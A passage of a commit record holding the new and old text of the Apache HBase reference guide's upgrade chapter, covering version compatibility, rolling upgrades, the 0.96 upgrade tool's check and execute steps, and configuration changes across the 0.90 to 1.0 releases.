To have them rewritten as HFile v2 you must run a compaction.\n\nThe check step prints stats at the end of its run (grep for `\u201cResult:\u201d` in the log) printing the absolute path of the tables it scanned, any HFile v1 files found, the regions containing said files (these regions will need a major compaction), and any corrupted files if found. A corrupt file is unreadable, and so its format is undefined (neither HFile v1 nor HFile v2).\n\nTo run the check step, run\n\n[source,bash]\n----\n$ bin\/hbase upgrade -check\n----\n\nHere is sample output:\n----\nTables Processed:\nhdfs:\/\/localhost:41020\/myHBase\/.META.\nhdfs:\/\/localhost:41020\/myHBase\/usertable\nhdfs:\/\/localhost:41020\/myHBase\/TestTable\nhdfs:\/\/localhost:41020\/myHBase\/t\n\nCount of HFileV1: 2\nHFileV1:\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/fa02dac1f38d03577bd0f7e666f12812\/family\/249450144068442524\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/ecdd3eaee2d2fcf8184ac025555bb2af\/family\/249450144068442512\n\nCount of corrupted files: 1\nCorrupted Files:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\/family\/1\nCount of Regions with HFileV1: 2\nRegions to Major Compact:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/ecdd3eaee2d2fcf8184ac025555bb2af\n\nThere are some HFileV1, or corrupt files (files with incorrect major version)\n----\n\nIn the above sample output, there are two HFile v1 files in two regions, and one corrupt file. Corrupt files should probably be removed. The regions that have HFile v1s need to be major compacted. To major compact, start up the hbase shell and review how to compact an individual region. After the major compaction is done, rerun the check step and the HFile v1 files should be gone, replaced by HFile v2 instances.\n\n
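For example, a minimal shell invocation (using the `usertable` table from the sample output above; `major_compact` also accepts an individual region name if you want to compact just one of the reported regions):\n----\nhbase> major_compact 'usertable'\n----\n\nBy default, the check step scans the HBase root directory (defined as `hbase.rootdir` in the configuration). To scan a specific directory only, pass the `-dir` option.\n[source,bash]\n----\n$ bin\/hbase upgrade -check -dir \/myHBase\/testTable\n----\nThe above command would detect HFile v1 files in the _\/myHBase\/testTable_ directory.\n\nOnce the check step reports all the HFile v1 files have been rewritten, it is safe to proceed with the upgrade.\n\n.execute\nAfter the _check_ step shows the cluster is free of HFile v1, it is safe to proceed with the upgrade. Next is the _execute_ step. You must *SHUTDOWN YOUR 0.94.x CLUSTER* before you can run the execute step. The execute step will not run if it detects running HBase masters or RegionServers.\n\n[NOTE]\n====\nHDFS and ZooKeeper should be up and running during the upgrade process. If ZooKeeper is managed by HBase, then you can start ZooKeeper so it is available to the upgrade by running\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh start zookeeper\n----\n====\n\nThe execute upgrade step is made of three substeps.\n\n* Namespaces: HBase 0.96.0 has support for namespaces. The upgrade needs to reorder directories in the filesystem for namespaces to work.\n\n* ZNodes: All znodes are purged so that new ones can be written in their place using a new protobuf'ed format and a few are migrated in place: e.g. replication and table state znodes.\n\n* WAL Log Splitting: If the 0.94.x cluster shutdown was not clean, we'll split WAL logs as part of migration before we start up on 0.96.0. 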
This WAL splitting runs slower than the native distributed WAL splitting because it is all inside the single upgrade process (so try to get a clean shutdown of the 0.94.0 cluster if you can).\n\nTo run the _execute_ step, first make sure that you have copied the HBase 0.96.0 binaries everywhere, under servers and under clients. Make sure the 0.94.0 cluster is down. Then do as follows:\n[source,bash]\n----\n$ bin\/hbase upgrade -execute\n----\nHere is some sample output.\n\n----\nStarting Namespace upgrade\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=7\nMigrating table testTable to hdfs:\/\/localhost:41020\/myHBase\/.data\/default\/testTable\n.....\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=8\nSuccessfully completed NameSpace upgrade.\nStarting Znode upgrade\n.....\nSuccessfully completed Znode upgrade\n\nStarting Log splitting\n...\nSuccessfully completed Log splitting\n----\n\nIf the output from the execute step looks good, stop the ZooKeeper instance you started to do the upgrade:\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh stop zookeeper\n----\nNow start up hbase-0.96.0.\n\n[[s096.migration.troubleshooting]]\n=== Troubleshooting\n\n[[s096.migration.troubleshooting.old.client]]\n.Old Client connecting to 0.96 cluster\nIt will fail with an exception like the below. Upgrade.\n----\n17:22:15 Exception in thread \"main\" java.lang.IllegalArgumentException: Not a host:port pair: PBUF\n17:22:15 *\n17:22:15 api-compat-8.ent.cloudera.com \ufffd\ufffd \ufffd\ufffd\ufffd(\n17:22:15 at org.apache.hadoop.hbase.util.Addressing.parseHostname(Addressing.java:60)\n17:22:15 at org.apache.hadoop.hbase.ServerName.<init>(ServerName.java:101)\n17:22:15 at org.apache.hadoop.hbase.ServerName.parseVersionedServerName(ServerName.java:283)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.bytesToServerName(MasterAddressTracker.java:77)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.getMasterAddress(MasterAddressTracker.java:61)\n17:22:15 at org.apache.hadoop.hbase.client.HConnectionManager$HConnectionImplementation.getMaster(HConnectionManager.java:703)\n17:22:15 at org.apache.hadoop.hbase.client.HBaseAdmin.<init>(HBaseAdmin.java:126)\n17:22:15 at Client_4_3_0.setup(Client_4_3_0.java:716)\n17:22:15 at Client_4_3_0.main(Client_4_3_0.java:63)\n----\n\n==== Upgrading `META` to use Protocol Buffers (Protobuf)\n\nWhen you upgrade from versions prior to 0.96, `META` needs to be converted to use protocol buffers. This is controlled by the configuration option `hbase.MetaMigrationConvertingToPB`, which is set to `true` by default. Therefore, by default, no action is required on your part.\n\nThe migration is a one-time event. However, every time your cluster starts, `META` is scanned to ensure that it does not need to be converted. If you have a very large number of regions, this scan can take a long time. Starting in 0.98.5, you can set `hbase.MetaMigrationConvertingToPB` to `false` in _hbase-site.xml_, to disable this start-up scan. This should be considered an expert-level setting.\n\n
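If you do disable it, a minimal sketch of the _hbase-site.xml_ override (the property name is the one given above; only use this if the start-up scan is demonstrably costing you):\n\n----\n<property>\n  <name>hbase.MetaMigrationConvertingToPB<\/name>\n  <value>false<\/value>\n<\/property>\n----\n\n[[upgrade0.94]]\n=== Upgrading from 0.92.x to 0.94.x\nWe used to think that 0.92 and 0.94 were interface compatible and that you could do a rolling upgrade between these versions, but then we discovered that link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5357[HBASE-5357 Use builder pattern in HColumnDescriptor] changed method signatures so that rather than returning `void` they instead return `HColumnDescriptor`. 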
This will throw `java.lang.NoSuchMethodError: org.apache.hadoop.hbase.HColumnDescriptor.setMaxVersions(I)V` so 0.92 and 0.94 are NOT compatible. You cannot do a rolling upgrade between them.\n\n[[upgrade0.92]]\n=== Upgrading from 0.90.x to 0.92.x\n==== Upgrade Guide\nYou will find that 0.92.0 runs a little differently from 0.90.x releases. Here are a few things to watch out for upgrading from 0.90.x to 0.92.0.\n\n.tl;dr\n[NOTE]\n====\nThese are the important things to know before upgrading.\n. Once you upgrade, you can\u2019t go back.\n\n. MSLAB is on by default. Watch that heap usage if you have a lot of regions.\n\n. Distributed Log Splitting is on by default. It should make RegionServer failover faster.\n\n. There\u2019s a separate tarball for security.\n\n. If `-XX:MaxDirectMemorySize` is set in your _hbase-env.sh_, it\u2019s going to enable the experimental off-heap cache (You may not want this).\n====\n\n.You can\u2019t go back!\nTo move to 0.92.0, all you need to do is shut down your cluster, replace your HBase 0.90.x with HBase 0.92.0 binaries (be sure you clear out all 0.90.x instances) and restart (You cannot do a rolling restart from 0.90.x to 0.92.x -- you must restart). On startup, the `.META.` table content is rewritten removing the table schema from the `info:regioninfo` column. Also, any flushes done post first startup will write out data in the new 0.92.0 file format, <<hfilev2>>. This means you cannot go back to 0.90.x once you\u2019ve started HBase 0.92.0 over your HBase data directory.\n\n.MSLAB is ON by default\nIn 0.92.0, the `<<hbase.hregion.memstore.mslab.enabled,hbase.hregion.memstore.mslab.enabled>>` flag is set to `true` (See <<gcpause>>). In 0.90.x it was false. When it is enabled, memstores will allocate memory in 2MB MSLAB chunks even if the memstore has zero or just a few small elements. This is usually fine, but if you had lots of regions per RegionServer in a 0.90.x cluster (and MSLAB was off), you may find yourself OOME'ing on upgrade because the `thousands of regions * number of column families * 2MB MSLAB` (at a minimum) puts your heap over the top. Set `hbase.hregion.memstore.mslab.enabled` to `false` or set the MSLAB size down from 2MB by setting `hbase.hregion.memstore.mslab.chunksize` to something less.\n\n
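For example, a sketch of the two _hbase-site.xml_ overrides just described, using the property names from the paragraph above; pick one or the other, and note that the 1MB chunk size is illustrative only, not a recommendation:\n\n----\n<property>\n  <name>hbase.hregion.memstore.mslab.enabled<\/name>\n  <value>false<\/value>\n<\/property>\n<!-- or keep MSLAB but shrink the per-memstore chunk; value is in bytes -->\n<property>\n  <name>hbase.hregion.memstore.mslab.chunksize<\/name>\n  <value>1048576<\/value>\n<\/property>\n----\n\n[[dls]]\n.Distributed Log Splitting is on by default\nPreviously, WAL logs on crash were split by the Master alone. In 0.92.0, log splitting is done by the cluster (See link:https:\/\/issues.apache.org\/jira\/browse\/hbase-1364[HBASE-1364 [performance\\] Distributed splitting of regionserver commit logs] or see the blog post link:http:\/\/blog.cloudera.com\/blog\/2012\/07\/hbase-log-splitting\/[Apache HBase Log Splitting]). This should cut down significantly on the amount of time it takes splitting logs and getting regions back online again.\n\n.Memory accounting is different now\nIn 0.92.0, <<hfilev2>> indices and bloom filters take up residence in the same LRU used for caching blocks that come from the filesystem. In 0.90.x, the HFile v1 indices lived outside of the LRU so they took up space even if the index was on a \u2018cold\u2019 file, one that wasn\u2019t being actively used. With the indices now in the LRU, you may find you have less space for block caching. Adjust your block cache accordingly. See <<block.cache>> for more detail. The block cache default size has been changed in 0.92.0 from 0.2 (20 percent of heap) to 0.25.\n\n.On the Hadoop version to use\nRun 0.92.0 on Hadoop 1.0.x (or CDH3u3). 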
The performance benefits are worth making the move. Otherwise, our Hadoop prescription is as it has been; you need a Hadoop that supports a working sync. See <<hadoop>>.\n\nIf running on Hadoop 1.0.x (or CDH3u3), enable local read. See the link:http:\/\/files.meetup.com\/1350427\/hug_ebay_jdcryans.pdf[Practical Caching] presentation for ruminations on the performance benefits of \u2018going local\u2019 (and for how to enable local reads).\n\n.HBase 0.92.0 ships with ZooKeeper 3.4.2\nIf you can, upgrade your ZooKeeper. If you can\u2019t, 3.4.2 clients should work against 3.3.X ensembles (HBase makes use of the 3.4.2 API).\n\n.Online alter is off by default\nIn 0.92.0, we\u2019ve added an experimental online schema alter facility (See <<hbase.online.schema.update.enable,hbase.online.schema.update.enable>>). It's off by default. Enable it at your own risk. Online alter and splitting tables do not play well together so be sure your cluster is quiescent while using this feature (for now).\n\n.WebUI\nThe web UI has had a few additions made in 0.92.0. It now shows a list of the regions currently transitioning, recent compactions\/flushes, and a process list of running processes (usually empty if all is well and requests are being handled promptly). Other additions include requests by region, a debugging servlet dump, etc.\n\n.Security tarball\nWe now ship with two tarballs; secure and insecure HBase. Documentation on how to set up a secure HBase is on the way.\n\n.Changes in HBase replication\n0.92.0 adds two new features: multi-slave and multi-master replication. The way to enable this is the same as adding a new peer, so in order to have multi-master you would just run add_peer for each cluster that acts as a master to the other slave clusters. Collisions are handled at the timestamp level, which may or may not be what you want; this needs to be evaluated on a per-use-case basis. Replication is still experimental in 0.92 and is disabled by default; run it at your own risk.\n\n.RegionServer now aborts if OOME\nIf an OOME occurs, we now have the JVM kill -9 the RegionServer process so it goes down fast. Previously, a RegionServer might stick around after incurring an OOME, limping along in some wounded state. To disable this facility (though we recommend you leave it in place), you\u2019d need to edit the bin\/hbase file. Look for the addition of the -XX:OnOutOfMemoryError=\"kill -9 %p\" arguments (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4769[HBASE-4769 - \u2018Abort RegionServer Immediately on OOME\u2019]).\n\n.HFile v2 and the \u201cBigger, Fewer\u201d Tendency\n0.92.0 stores data in a new format, <<hfilev2>>. As HBase runs, it will move all your data from HFile v1 to HFile v2 format. This auto-migration will run in the background as flushes and compactions run. HFile v2 allows HBase to run with larger regions\/files. In fact, we encourage that all HBasers going forward tend toward Facebook axiom #1, run with larger, fewer regions. If you have lots of regions now -- more than 100s per host -- you should look into setting your region size up after you move to 0.92.0 (in 0.92.0, the default size is now 1G, up from 256M), and then running the online merge tool (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621 merge tool should work on online cluster, but disabled table]).\n\n[[upgrade0.90]]\n=== Upgrading to HBase 0.90.x from 0.20.x or 0.89.x\nThis version of 0.90.x HBase can be started on data written by HBase 0.20.x or HBase 0.89.x. There is no need for a migration step. 
HBase 0.89.x and 0.90.x do write out the name of region directories differently -- they name them with an MD5 hash of the region name rather than a Jenkins hash -- so this means that once started, there is no going back to HBase 0.20.x.\n\nBe sure to remove the _hbase-default.xml_ from your _conf_ directory on upgrade. A 0.20.x version of this file will have sub-optimal configurations for 0.90.x HBase. The _hbase-default.xml_ file is now bundled into the HBase jar and read from there. If you would like to review the content of this file, see it in the src tree at _src\/main\/resources\/hbase-default.xml_ or see <<hbase_default_configurations>>.\n\nFinally, if upgrading from 0.20.x, check your .META. schema in the shell. In the past we would recommend that users run with a 16kb MEMSTORE_FLUSHSIZE. Run\n----\nhbase> scan '-ROOT-'\n----\nin the shell. This will output the current `.META.` schema. Check `MEMSTORE_FLUSHSIZE` size. Is it 16kb (16384)? If so, you will need to change this (the 'normal'\/default value is 64MB (67108864)). Run the script `bin\/set_meta_memstore_size.rb`. This will make the necessary edit to your `.META.` schema. Failure to run this change will make for a slow cluster. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-3499[HBASE-3499 Users upgrading to 0.90.0 need to have their .META. table updated with the right MEMSTORE_SIZE].\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[upgrading]]\n= Upgrading\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nYou cannot skip major versions when upgrading. If you are upgrading from version 0.90.x to 0.94.x, you must first go from 0.90.x to 0.92.x and then go from 0.92.x to 0.94.x.\n\nNOTE: It may be possible to skip across versions -- for example go from 0.92.2 straight to 0.98.0 just following the 0.96.x upgrade instructions -- but these scenarios are untested.\n\nReview <<configuration>>, in particular <<hadoop>>.\n\n[[hbase.versioning]]\n== HBase version number and compatibility\n\nHBase has two versioning schemes, pre-1.0 and post-1.0. Both are detailed below.\n\n[[hbase.versioning.post10]]\n=== Post 1.0 versions\n\nStarting with the 1.0.0 release, HBase uses link:http:\/\/semver.org\/[Semantic Versioning] for its release versioning. 
In summary:\n\n.Given a version number MAJOR.MINOR.PATCH, increment the:\n* MAJOR version when you make incompatible API changes,\n* MINOR version when you add functionality in a backwards-compatible manner, and\n* PATCH version when you make backwards-compatible bug fixes.\n* Additional labels for pre-release and build metadata are available as extensions to the MAJOR.MINOR.PATCH format.\n\n[[hbase.versioning.compat]]\n.Compatibility Dimensions\nIn addition to the usual API versioning considerations HBase has other compatibility dimensions that we need to consider.\n\n.Client-Server wire protocol compatibility\n* Allows updating client and server out of sync.\n* We could only allow upgrading the server first. I.e. the server would be backward compatible to an old client, that way new APIs are OK.\n* Example: A user should be able to use an old client to connect to an upgraded cluster.\n\n.Server-Server protocol compatibility\n* Servers of different versions can co-exist in the same cluster.\n* The wire protocol between servers is compatible.\n* Workers for distributed tasks, such as replication and log splitting, can co-exist in the same cluster.\n* Dependent protocols (such as using ZK for coordination) will also not be changed.\n* Example: A user can perform a rolling upgrade.\n\n.File format compatibility\n* Support file formats backward and forward compatible\n* Example: File, ZK encoding, directory layout is upgraded automatically as part of an HBase upgrade. User can rollback to the older version and everything will continue to work.\n\n.Client API compatibility\n* Allow changing or removing existing client APIs.\n* An API needs to deprecated for a major version before we will change\/remove it.\n* Example: A user using a newly deprecated api does not need to modify application code with hbase api calls until the next major version.\n\n.Client Binary compatibility\n* Old client code can run unchanged (no recompilation needed) against new jars.\n* Example: Old compiled client code will work unchanged with the new jars.\n\n.Server-Side Limited API compatibility (taken from Hadoop)\n* Internal APIs are marked as Stable, Evolving, or Unstable\n* This implies binary compatibility for coprocessors and plugins (pluggable classes, including replication) as long as these are only using marked interfaces\/classes.\n* Example: Old compiled Coprocessor, Filter, or Plugin code will work unchanged with the new jars.\n\n.Dependency Compatibility\n* An upgrade of HBase will not require an incompatible upgrade of a dependent project, including the Java runtime.\n* Example: An upgrade of Hadoop will not invalidate any of the compatibilities guarantees we made.\n\n.Operational Compatibility\n* Metric changes\n* Behavioral changes of services\n* Web page APIs\n\n.Summary\n* A patch upgrade is a drop-in replacement. Any change that is not Java binary compatible would not be allowed.footnote:[See http:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-13.html.]\n\n* A minor upgrade requires no application\/client code modification. Ideally it would be a drop-in replacement but client code, coprocessors, filters, etc might have to be recompiled if new jars are used.\n\n* A major upgrade allows the HBase community to make breaking changes.\n\n.Compatibility Matrix footnote:[Note that this indicates what could break, not that it will break. 
We will\/should add specifics in our release notes.]\n[cols=\"1,1,1,1\"]\n|===\n| | Major | Minor | Patch\n|Client-Server wire Compatibility| N |Y |Y\n|Server-Server Compatibility |N |Y |Y\n|File Format Compatibility | N footnote:[comp_matrix_offline_upgrade_note,Running an offline upgrade tool without rollback might be needed. We will typically only support migrating data from major version X to major version X+1.] | Y |Y\n|Client API Compatibility | N | Y |Y\n|Client Binary Compatibility | N | N |Y\n4+|Server-Side Limited API Compatibility\n>| Stable | N | Y | Y\n>| Evolving | N |N |Y\n>| Unstable | N |N |N\n|Dependency Compatibility | N |Y |Y\n|Operational Compatibility | N |N |Y\n|===\n\n[[hbase.client.api.surface]]\n==== HBase API Surface\n\nHBase has a lot of API points, but for the compatibility matrix above, we differentiate between Client API, Limited Private API, and Private API. HBase uses a version of link:https:\/\/hadoop.apache.org\/docs\/current\/hadoop-project-dist\/hadoop-common\/Compatibility.html[Hadoop's Interface classification]. HBase's Interface classification classes can be found link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/classification\/package-summary.html[here].\n\n* InterfaceAudience: captures the intended audience, possible values are Public (for end users and external projects), LimitedPrivate (for other Projects, Coprocessors or other plugin points), and Private (for internal use).\n* InterfaceStability: describes what types of interface changes are permitted. Possible values are Stable, Evolving, Unstable, and Deprecated.\n\n[[hbase.client.api]]\nHBase Client API::\n HBase Client API consists of all the classes or methods that are marked with InterfaceAudience.Public interface. All main classes in hbase-client and dependent modules have either InterfaceAudience.Public, InterfaceAudience.LimitedPrivate, or InterfaceAudience.Private marker. Not all classes in other modules (hbase-server, etc) have the marker. If a class is not annotated with one of these, it is assumed to be a InterfaceAudience.Private class.\n\n[[hbase.limitetprivate.api]]\nHBase LimitedPrivate API::\n LimitedPrivate annotation comes with a set of target consumers for the interfaces. Those consumers are coprocessors, phoenix, replication endpoint implemnetations or similar. At this point, HBase only guarantees source and binary compatibility for these interfaces between patch versions.\n\n[[hbase.private.api]]\nHBase Private API::\n All classes annotated with InterfaceAudience.Private or all classes that do not have the annotation are for HBase internal use only. The interfaces and method signatures can change at any point in time. If you are relying on a particular interface that is marked Private, you should open a jira to propose changing the interface to be Public or LimitedPrivate, or an interface exposed for this purpose.\n\n[[hbase.versioning.pre10]]\n=== Pre 1.0 versions\n\nBefore the semantic versioning scheme pre-1.0, HBase tracked either Hadoop's versions (0.2x) or 0.9x versions. If you are into the arcane, checkout our old wiki page on link:http:\/\/wiki.apache.org\/hadoop\/Hbase\/HBaseVersions[HBase Versioning] which tries to connect the HBase version dots. Below sections cover ONLY the releases before 1.0.\n\n[[hbase.development.series]]\n.Odd\/Even Versioning or \"Development\" Series Releases\nAhead of big releases, we have been putting up preview versions to start the feedback cycle turning-over earlier. 
These \"Development\" Series releases, always odd-numbered, come with no guarantees, not even regards being able to upgrade between two sequential releases (we reserve the right to break compatibility across \"Development\" Series releases). Needless to say, these releases are not for production deploys. They are a preview of what is coming in the hope that interested parties will take the release for a test drive and flag us early if we there are issues we've missed ahead of our rolling a production-worthy release.\n\nOur first \"Development\" Series was the 0.89 set that came out ahead of HBase 0.90.0. HBase 0.95 is another \"Development\" Series that portends HBase 0.96.0. 0.99.x is the last series in \"developer preview\" mode before 1.0. Afterwards, we will be using semantic versioning naming scheme (see above).\n\n[[hbase.binary.compatibility]]\n.Binary Compatibility\nWhen we say two HBase versions are compatible, we mean that the versions are wire and binary compatible. Compatible HBase versions means that clients can talk to compatible but differently versioned servers. It means too that you can just swap out the jars of one version and replace them with the jars of another, compatible version and all will just work. Unless otherwise specified, HBase point versions are (mostly) binary compatible. You can safely do rolling upgrades between binary compatible versions; i.e. across point versions: e.g. from 0.94.5 to 0.94.6. See link:[Does compatibility between versions also mean binary compatibility?] discussion on the HBase dev mailing list.\n\n[[hbase.rolling.upgrade]]\n=== Rolling Upgrades\n\nA rolling upgrade is the process by which you update the servers in your cluster a server at a time. You can rolling upgrade across HBase versions if they are binary or wire compatible. See <<hbase.rolling.restart>> for more on what this means. Coarsely, a rolling upgrade is a graceful stop each server, update the software, and then restart. You do this for each server in the cluster. Usually you upgrade the Master first and then the RegionServers. See <<rolling>> for tools that can help use the rolling upgrade process.\n\nFor example, in the below, HBase was symlinked to the actual HBase install. On upgrade, before running a rolling restart over the cluser, we changed the symlink to point at the new HBase software version and then ran\n\n[source,bash]\n----\n$ HADOOP_HOME=~\/hadoop-2.6.0-CRC-SNAPSHOT ~\/hbase\/bin\/rolling-restart.sh --config ~\/conf_hbase\n----\n\nThe rolling-restart script will first gracefully stop and restart the master, and then each of the RegionServers in turn. Because the symlink was changed, on restart the server will come up using the new HBase version. Check logs for errors as the rolling upgrade proceeds.\n\n[[hbase.rolling.restart]]\n.Rolling Upgrade Between Versions that are Binary\/Wire Compatible\nUnless otherwise specified, HBase point versions are binary compatible. You can do a <<hbase.rolling.upgrade>> between HBase point versions. For example, you can go to 0.94.6 from 0.94.5 by doing a rolling upgrade across the cluster replacing the 0.94.5 binary with a 0.94.6 binary.\n\nIn the minor version-particular sections below, we call out where the versions are wire\/protocol compatible and in this case, it is also possible to do a <<hbase.rolling.upgrade>>. 
For example, in <<upgrade1.0.rolling.upgrade>>, we state that it is possible to do a rolling upgrade between hbase-0.98.x and hbase-1.0.0.\n\n== Upgrade Paths\n\n[[upgrade1.0]]\n=== Upgrading from 0.98.x to 1.0.x\n\nIn this section we first note the significant changes that come in with 1.0.0 HBase and then we go over the upgrade process. Be sure to read the significant changes section with care so you avoid surprises.\n\n==== Changes of Note!\n\nIn here we list important changes that are in 1.0.0 since 0.98.x., changes you should be aware that will go into effect once you upgrade.\n\n[[zookeeper.3.4]]\n.ZooKeeper 3.4 is required in HBase 1.0.0\nSee <<zookeeper.requirements>>.\n\n[[default.ports.changed]]\n.HBase Default Ports Changed\nThe ports used by HBase changed. They used to be in the 600XX range. In HBase 1.0.0 they have been moved up out of the ephemeral port range and are 160XX instead (Master web UI was 60010 and is now 16010; the RegionServer web UI was 60030 and is now 16030, etc.). If you want to keep the old port locations, copy the port setting configs from _hbase-default.xml_ into _hbase-site.xml_, change them back to the old values from the HBase 0.98.x era, and ensure you've distributed your configurations before you restart.\n\n[[upgrade1.0.hbase.bucketcache.percentage.in.combinedcache]]\n.hbase.bucketcache.percentage.in.combinedcache configuration has been REMOVED\nYou may have made use of this configuration if you are using BucketCache. If NOT using BucketCache, this change does not effect you. Its removal means that your L1 LruBlockCache is now sized using `hfile.block.cache.size` -- i.e. the way you would size the on-heap L1 LruBlockCache if you were NOT doing BucketCache -- and the BucketCache size is not whatever the setting for `hbase.bucketcache.size` is. You may need to adjust configs to get the LruBlockCache and BucketCache sizes set to what they were in 0.98.x and previous. If you did not set this config., its default value was 0.9. If you do nothing, your BucketCache will increase in size by 10%. Your L1 LruBlockCache will become `hfile.block.cache.size` times your java heap size (`hfile.block.cache.size` is a float between 0.0 and 1.0). To read more, see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11520[HBASE-11520 Simplify offheap cache config by removing the confusing \"hbase.bucketcache.percentage.in.combinedcache\"].\n\n[[hbase-12068]]\n.If you have your own customer filters.\nSee the release notes on the issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12068[HBASE-12068 [Branch-1\\] Avoid need to always do KeyValueUtil#ensureKeyValue for Filter transformCell]; be sure to follow the recommendations therein.\n\n[[dlr]]\n.Distributed Log Replay\n<<distributed.log.replay>> is off by default in HBase 1.0.0. Enabling it can make a big difference improving HBase MTTR. Enable this feature if you are doing a clean stop\/start when you are upgrading. You cannot rolling upgrade to this feature (caveat if you are running on a version of HBase in excess of HBase 0.98.4 -- see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12577[HBASE-12577 Disable distributed log replay by default] for more).\n\n[[upgrade1.0.rolling.upgrade]]\n==== Rolling upgrade from 0.98.x to HBase 1.0.0\n.From 0.96.x to 1.0.0\nNOTE: You cannot do a <<hbase.rolling.upgrade,rolling upgrade>> from 0.96.x to 1.0.0 without first doing a rolling upgrade to 0.98.x. 
See comment in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11164?focusedCommentId=14182330&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-14182330[HBASE-11164 Document and test rolling updates from 0.98 -> 1.0] for the why. Also because HBase 1.0.0 enables HFile v3 by default, link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-9801[HBASE-9801 Change the default HFile version to V3], and support for HFile v3 only arrives in 0.98, this is another reason you cannot rolling upgrade from HBase 0.96.x; if the rolling upgrade stalls, the 0.96.x servers cannot open files written by the servers running the newer HBase 1.0.0 with HFile's of version 3.\n\nThere are no known issues running a <<hbase.rolling.upgrade,rolling upgrade>> from HBase 0.98.x to HBase 1.0.0.\n\n[[upgrade1.0.from.0.94]]\n==== Upgrading to 1.0 from 0.94\nYou cannot rolling upgrade from 0.94.x to 1.x.x. You must stop your cluster, install the 1.x.x software, run the migration described at <<executing.the.0.96.upgrade>> (substituting 1.x.x. wherever we make mention of 0.96.x in the section below), and then restart. Be sure to upgrade your ZooKeeper if it is a version less than the required 3.4.x.\n\n[[upgrade0.98]]\n=== Upgrading from 0.96.x to 0.98.x\nA rolling upgrade from 0.96.x to 0.98.x works. The two versions are not binary compatible.\n\nAdditional steps are required to take advantage of some of the new features of 0.98.x, including cell visibility labels, cell ACLs, and transparent server side encryption. See <<security>> for more information. Significant performance improvements include a change to the write ahead log threading model that provides higher transaction throughput under high load, reverse scanners, MapReduce over snapshot files, and striped compaction.\n\nClients and servers can run with 0.98.x and 0.96.x versions. However, applications may need to be recompiled due to changes in the Java API.\n\n=== Upgrading from 0.94.x to 0.98.x\nA rolling upgrade from 0.94.x directly to 0.98.x does not work. The upgrade path follows the same procedures as <<upgrade0.96>>. Additional steps are required to use some of the new features of 0.98.x. See <<upgrade0.98>> for an abbreviated list of these features.\n\n[[upgrade0.96]]\n=== Upgrading from 0.94.x to 0.96.x\n\n==== The \"Singularity\"\n\n.HBase 0.96.x was EOL'd, September 1st, 2014\nNOTE: Do not deploy 0.96.x Deploy at least 0.98.x. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11642[EOL 0.96].\n\nYou will have to stop your old 0.94.x cluster completely to upgrade. If you are replicating between clusters, both clusters will have to go down to upgrade. Make sure it is a clean shutdown. The less WAL files around, the faster the upgrade will run (the upgrade will split any log files it finds in the filesystem as part of the upgrade process). All clients must be upgraded to 0.96 too.\n\nThe API has changed. You will need to recompile your code against 0.96 and you may need to adjust applications to go against new APIs (TODO: List of changes).\n\n[[executing.the.0.96.upgrade]]\n==== Executing the 0.96 Upgrade\n\n.HDFS and ZooKeeper must be up!\nNOTE: HDFS and ZooKeeper should be up and running during the upgrade process.\n\nHBase 0.96.0 comes with an upgrade script. Run\n\n[source,bash]\n----\n$ bin\/hbase upgrade\n----\nto see its usage. The script has two main modes: `-check`, and `-execute`.\n\n.check\nThe check step is run against a running 0.94 cluster. Run it from a downloaded 0.96.x binary. 
The check step is looking for the presence of HFile v1 files. These are unsupported in HBase 0.96.0. To have them rewritten as HFile v2 you must run a compaction.\n\nThe check step prints stats at the end of its run (grep for `\u201cResult:\u201d` in the log) printing absolute path of the tables it scanned, any HFile v1 files found, the regions containing said files (these regions will need a major compaction), and any corrupted files if found. A corrupt file is unreadable, and so is undefined (neither HFile v1 nor HFile v2).\n\nTo run the check step, run\n\n[source,bash]\n----\n$ bin\/hbase upgrade -check\n----\n\nHere is sample output:\n----\nTables Processed:\nhdfs:\/\/localhost:41020\/myHBase\/.META.\nhdfs:\/\/localhost:41020\/myHBase\/usertable\nhdfs:\/\/localhost:41020\/myHBase\/TestTable\nhdfs:\/\/localhost:41020\/myHBase\/t\n\nCount of HFileV1: 2\nHFileV1:\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/fa02dac1f38d03577bd0f7e666f12812\/family\/249450144068442524\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/ecdd3eaee2d2fcf8184ac025555bb2af\/family\/249450144068442512\n\nCount of corrupted files: 1\nCorrupted 